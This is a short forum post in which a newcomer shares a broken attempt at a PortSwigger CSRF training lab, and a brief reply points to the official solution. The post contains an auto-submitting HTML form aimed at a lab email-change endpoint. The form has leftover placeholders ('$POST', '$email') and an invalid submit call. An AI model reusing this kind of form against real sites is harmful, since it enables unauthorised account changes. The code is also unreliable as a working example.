I am trying to solve the CSRF exercise/tutorial. I'm new to Burp/PortSwigger. Here is a link to the exercise: https://portswigger.net/web-security/csrf/lab-no-defenses
The solution I came up with is this:
<form method="$POST" action="https://acfd1fc01ec27f6f80b26b810015001d.web-security-academy.net/email">
    <input type="hidden" name="$email" value="$badEmail@bad.com">
</form>
<script>
    document.forms.submit();
</script>
After checking to see if it works, I am brought back to the fake change email page, and I can see the values changed/represented in the URL, but the icon that says "unsolved" doesn't change to "solved". Does anyone know what I'm doing wrong?
Have you followed the steps in the solution?
We’ve tested the solution and it works for us.